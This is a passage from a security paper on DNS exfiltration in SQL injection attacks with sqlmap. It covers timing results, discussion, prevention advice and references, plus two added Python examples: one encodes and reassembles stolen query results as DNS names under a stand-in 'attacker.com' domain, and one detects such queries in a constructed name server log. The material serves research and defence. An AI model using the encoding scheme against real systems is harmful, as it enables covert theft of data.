Time-based (1 sec)      32,716          17,720.51
Error-based             777             9.02
Union (full/partial)    3/136           0.70/2.50
DNS exfiltration        1,409           35.31

Figure 2: DNS exfiltration in SQLi attack

¹² DNS exfiltration support is officially available in the sqlmap development version (v1.0-dev) starting with r5086 [1]
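The label encoding that Section 5 describes, as an added example that is not sqlmap's own code: hexadecimal form so that any byte survives as a valid RFC 1034 label, chunks of at most 63 characters, and a random prefix/suffix pair per result. The name layout <prefix>.<seq>.<hex>.<suffix>.<domain> and the explicit sequence label are this example's assumptions; the decoder is the reassembly step an analyst needs when reading such names back out of a name server's query log, including the case where a chunk never arrived.

```python
import binascii
import re
import secrets
from typing import Dict, List, Tuple

# Assumed layout of one exfiltration name (this example's own, not sqlmap's):
#   <prefix>.<seq>.<hex chunk>.<suffix>.<domain>
# prefix/suffix are random per result, so every name is unique (no cache hit,
# and the receiver can tell results apart); seq numbers the chunks so that
# reassembly does not depend on the order in which the UDP queries arrive.
MAX_LABEL = 63        # RFC 1034: a label is at most 63 octets
HEX_PER_CHUNK = 62    # even, so every chunk carries whole bytes
ALPHABET = "abcdefghijklmnopqrstuvwxyz"
NAME_RE = re.compile(r"^([a-z]+)\.(\d+)\.([0-9a-f]+)\.([a-z]+)\.(.+)$")


def random_boundary(length: int = 6) -> str:
    """Random lowercase boundary label used as prefix or suffix."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def encode_result(data: bytes, domain: str, prefix: str, suffix: str) -> List[str]:
    """Names that would carry one SQL result; empty data yields no names."""
    hexed = binascii.hexlify(data).decode("ascii")
    names = []
    for seq, start in enumerate(range(0, len(hexed), HEX_PER_CHUNK)):
        chunk = hexed[start:start + HEX_PER_CHUNK]
        name = f"{prefix}.{seq}.{chunk}.{suffix}.{domain}"
        # Every label must fit the RFC 1034 limit, or the resolver rejects the name.
        assert all(len(label) <= MAX_LABEL for label in name.split("."))
        names.append(name)
    return names


def decode_results(query_names: List[str], domain: str) -> Dict[Tuple[str, str], bytes]:
    """Reassemble results from names seen at the name server, in any order.

    Returns {(prefix, suffix): bytes}; a result with a missing chunk is left
    out rather than handed back corrupted.
    """
    chunks: Dict[Tuple[str, str], Dict[int, str]] = {}
    for name in query_names:
        match = NAME_RE.match(name.lower().rstrip("."))
        if not match or match.group(5) != domain:
            continue  # ordinary traffic for the zone, or some other domain
        prefix, seq, hexdata, suffix = (match.group(1), int(match.group(2)),
                                        match.group(3), match.group(4))
        chunks.setdefault((prefix, suffix), {})[seq] = hexdata
    results: Dict[Tuple[str, str], bytes] = {}
    for key, parts in chunks.items():
        if sorted(parts) != list(range(len(parts))):
            continue  # a chunk never arrived: do not return a corrupted value
        try:
            results[key] = binascii.unhexlify("".join(parts[i] for i in range(len(parts))))
        except binascii.Error:
            continue  # odd-length or non-hex label: not one of ours
    return results


if __name__ == "__main__":
    # Constructed sample: a value with non-word characters that plain labels could not carry.
    sample = b"sa:*A1B2C3 hash with spaces\x00\xff"
    pre, suf = random_boundary(), random_boundary()
    names = encode_result(sample, "attacker.com", pre, suf)
    for n in names:
        print(n)
    recovered = decode_results(list(reversed(names)) + ["www.attacker.com"], "attacker.com")
    print(recovered[(pre, suf)] == sample)
```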
7 Discussion
From the results given in Table 1 it can be seen that the inband techniques (union and error-based) were the fastest ones, while the inference techniques (boolean-based blind and time-based) were the slowest. DNS exfiltration was, as expected, slower than the slowest inband technique (error-based) while faster than the fastest inference technique (boolean-based blind). The time-based technique was clearly too slow¹³.

In real life scenarios all techniques would inherently experience an additional delay per request because of connection latency and the time needed for loading normal sized pages. In the SQLi vulnerable page used, a small table has been returned, making connection reads extremely fast. Also, in real life scenarios unwanted connection latency would just introduce a need for a higher time-delay¹⁴ value in the time-based technique, making the dumping process even slower in those kinds of cases.

There is also the fact that in a real life scenario the DNS exfiltration technique would get an additional delay introduced by the usage of non-local network based DNS servers. Nevertheless, the difference between it and the inference techniques would stay at a considerable ratio, because the latter will need more time to retrieve the same data because of the inevitably higher number of requests.

All in all, the numbers for the DNS exfiltration technique look quite promising, making it a perfect alternative to the inference methods.

Figure 3: Traffic capture of sqlmap run with DNS exfiltration

8 Prevention tips
To avoid the attacks described in this paper, prevention of SQLi flaws must have the highest priority. Usage of prepared statements¹⁵ is considered to be the safest precaution [18]. Prepared statements ensure that attackers are not able to change the intent of a query, even if other SQL commands are inserted [19].

Various sanitization mechanisms like magic_quotes() and addslashes() can't completely prevent the presence or exploitation of a SQLi vulnerability, as certain techniques used in conjunction with environmental conditions could allow attackers to exploit the vulnerability [20][21]. Instead, if prepared statements are not used, it's recommended to use input validation with bad input being rejected, rather than escaped or modified [22].

The administrator should always be prepared for unauthorized access to the underlying database. A good counter-measure is the restriction of all database access to the least privilege. Thus, any given privilege should be granted to the least amount of code necessary for the shortest duration of time that is required to get the job done [23]. Following that principle, users must be able to access only the information and resources that are absolutely necessary.

As the last step, for successful mitigation of eventual DNS exfiltration attacks, the administrator has to make sure that the execution of all unnecessary system subroutines is constrained. If everything else fails, attackers mustn't be able to run those that could provoke DNS requests.

There has been some work in the field of detecting malicious activities in DNS traffic [25][26], but mostly because of the lack of practical and mainstream solutions, those won't be specially mentioned here.

9 Conclusion
In this paper, it has been shown how attackers can use the DNS exfiltration technique to considerably speed up data retrieval when only relatively slow inference SQLi techniques are usable. Also, the number of required requests toward the vulnerable web server is drastically reduced, making it less noisy.

Due to the requirement of controlling a domain's name server, it probably won't be used by the majority of attackers. From the implementation point of view everything was straightforward, hence its practical value is not to be ignored. The implemented support inside sqlmap should make it publicly available to all for further research.

¹³ That's the primary reason why the majority of attackers just skip cases where that's the only usable technique
¹⁴ To properly distinguish delayed and regular response times
¹⁵ Also referred to as parameterized queries
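Section 8 mentions the work on detecting malicious activity in DNS traffic [25][26] without going into it. As an added example that comes neither from the paper nor from sqlmap, the following scores a name server's query log for the footprint the technique leaves behind: long hex-only labels, a stream of never-repeating names under one domain, and names running close to the label limit. The log lines are constructed in the shape of a BIND query log, and the thresholds are this example's own assumptions.

```python
import math
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample in the shape of a BIND query log (not a real capture). The
# four long names carry 32 to 62 hexadecimal characters in a single label, which
# is what the hex encoding from Section 5 produces; the others are ordinary lookups.
SAMPLE_LOG = """\
client 172.16.138.129#1041: query: www.example.com IN A +
client 172.16.138.129#1042: query: qkzpl.0.0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcd.mvwta.attacker.com IN A +
client 172.16.138.129#1043: query: mail.example.com IN MX +
client 172.16.138.129#1044: query: qkzpl.1.fedcba9876543210fedcba9876543210fedcba9876543210fedcba98.mvwta.attacker.com IN A +
client 172.16.138.129#1045: query: ns1.attacker.com IN A +
client 172.16.138.129#1046: query: hxrcu.0.a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6.bqlse.attacker.com IN A +
client 172.16.138.129#1047: query: www.example.com IN A +
client 172.16.138.129#1048: query: hxrcu.1.deadbeefcafebabedeadbeefcafebabe.bqlse.attacker.com IN A +
client 172.16.138.129#1049: query: update.vendor.net IN A +
"""

QUERY_RE = re.compile(r"query: (\S+) IN (\S+)")
HEX_LABEL = re.compile(r"^[0-9a-f]{32,63}$")   # long label made only of hex digits

# Thresholds are this example's assumptions; tune them against local baseline traffic.
MIN_UNIQUE_RATIO = 0.9   # carrier names never repeat (random prefix/suffix per result)
MIN_NAME_LEN = 60        # carrier names run close to the 63-character label limit


def parse_queries(log: str) -> List[str]:
    """Extract the queried names from query log lines, normalised to lowercase."""
    names = []
    for line in log.splitlines():
        match = QUERY_RE.search(line)
        if match:
            names.append(match.group(1).lower().rstrip("."))
    return names


def registered_domain(name: str) -> str:
    """Last two labels; a public suffix list would be needed for names like co.uk."""
    return ".".join(name.split(".")[-2:])


def shannon_entropy(text: str) -> float:
    """Bits per character; hex data approaches 4.0, host names sit well below."""
    if not text:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def score_domains(names: List[str]) -> Dict[str, dict]:
    """Per registered domain: query count, unique-name ratio, hex labels, max length, flag."""
    stats = defaultdict(lambda: {"queries": 0, "unique": set(), "hex_labels": 0,
                                 "max_len": 0, "sub": ""})
    for name in names:
        s = stats[registered_domain(name)]
        s["queries"] += 1
        s["unique"].add(name)
        labels = name.split(".")[:-2]          # the part an attacker controls
        s["hex_labels"] += sum(1 for lab in labels if HEX_LABEL.match(lab))
        s["max_len"] = max(s["max_len"], len(name))
        s["sub"] += "".join(labels)
    report = {}
    for dom, s in stats.items():
        unique_ratio = len(s["unique"]) / s["queries"]
        report[dom] = {
            "queries": s["queries"],
            "unique_ratio": unique_ratio,
            "hex_labels": s["hex_labels"],
            "max_len": s["max_len"],
            "entropy": round(shannon_entropy(s["sub"]), 2),
            "suspicious": (s["hex_labels"] > 0 and unique_ratio >= MIN_UNIQUE_RATIO
                           and s["max_len"] >= MIN_NAME_LEN),
        }
    return report


if __name__ == "__main__":
    for dom, r in score_domains(parse_queries(SAMPLE_LOG)).items():
        print(dom, r)
```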
References
[1] sqlmap – automatic SQL injection and database takeover tool, Bernardo Damele A. G., Miroslav Štampar, http://www.sqlmap.org/
[2] Exfiltration: How Hackers Get the Data Out, Jart Armin, May 2011, http://news.hostexploit.com/cybercrime-news/4877-exfiltration-how-hackers-get-the-data-out.html
[3] Wireshark - network protocol analyzer, Wireshark Foundation, https://www.wireshark.org/
[4] The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System, Bill Blunden, WordWare Publishing, Inc., 2009
[5] DNS as a Covert Channel Within Protected Networks, Seth Bromberger, National Electric Sector Cyber Security Organization (NESCO), January 2001, http://energy.gov/sites/prod/files/oeprod/DocumentsandMedia/DNS_Exfiltration_2011-01-01_v1.1.pdf
[6] Data-mining with SQL Injection and Inference, David Litchfield, An NGSSoftware Insight Security Research Publication, September 2005, http://www.nccgroup.com/Libraries/Document_Downloads/Data-Mining_With_SQL_Injection_and_Inference.sflb.ashx
[7] Advanced SQL Injection, Joseph McCray, February 2009, http://www.slideshare.net/joemccray/AdvancedSQLInjectionv2
[8] SQL Injection and Data Mining through Inference, David Litchfield, BlackHat EU, 2005, https://www.blackhat.com/presentations/bh-europe-05/bh-eu-05-litchfield.pdf
[9] SQL – Injection & OOB – channels, Patrik Karlsson, DEF CON 15, August 2007, https://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf
[10] The TCP/IP Guide: A Comprehensive, Illustrated Internet Protocols Reference, Charles M. Kozierok, No Starch Press, 2005
[11] How DNS query works, Microsoft TechNet, January 2005, http://technet.microsoft.com/en-us/library/cc775637(v=ws.10).aspx
[12] Microsoft Windows 2000 DNS: Implementation and Administration, Kevin Kocis, Sams Publishing, 2001
[13] Useful undocumented extended stored procedures, Alexander Chigrik, 2010, http://www.mssqlcity.com/Articles/Undoc/UndocExtSP.htm
[14] Oracle9i XML API Reference - XDK and Oracle XML DB (Release 2), Oracle Corporation, March 2002, http://docs.oracle.com/cd/B10501_01/appdev.920/a96616.pdf
[15] Hacking Oracle From Web Apps, Sumit Siddharth, Aleksander Gorkowienko, 7Safe, DEF CON 18, November 2010, https://www.defcon.org/images/defcon-18/dc-18-presentations/Siddharth/DEFCON-18-Siddharth-Hacking-Oracle-From-Web.pdf
[16] Exploiting PL/SQL Injection With Only CREATE SESSION Privileges in Oracle 11g, David Litchfield, An NGSSoftware Insight Security Research Publication, October 2009, http://www.databasesecurity.com/ExploitingPLSQLinOracle11g.pdf
[17] RFC 1034: Domain Names – Concepts and Facilities, Paul Mockapetris, November 1987, https://www.ietf.org/rfc/rfc1034.txt
[18] SQL Injection Prevention Cheat Sheet, Open Web Application Security Project, March 2012, https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
[19] Parametrized SQL statement, Rosetta Code, August 2011, http://rosettacode.org/wiki/Parametrized_SQL_statement
[20] SQL Injection Attacks and Defense, Justin Clarke, Syngress, 2009
[21] addslashes() Versus mysql_real_escape_string(), Chris Shiflett, January 2006, http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
[22] Advanced SQL Injection, Victor Chapela, Sm4rt Security Services, OWASP, November 2005, https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
[23] Security Overview (ADO.NET), MSDN, Microsoft, 2012, http://msdn.microsoft.com/en-us/library/hdb58b2f.aspx
[24] The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws, Dafydd Stuttard, Marcus Pinto, John Wiley & Sons, 2011
[25] Detecting DNS Tunnels Using Character Frequency Analysis, Kenton Born, Dr. David Gustafson, Kansas State University, April 2010, http://arxiv.org/pdf/1004.4358.pdf
[26] Finding Malicious Activity in Bulk DNS Data, Ed Stoner, Carnegie Mellon University, 2010, www.cert.org/archive/pdf/research-rpt-2009/stoner-mal-act.pdf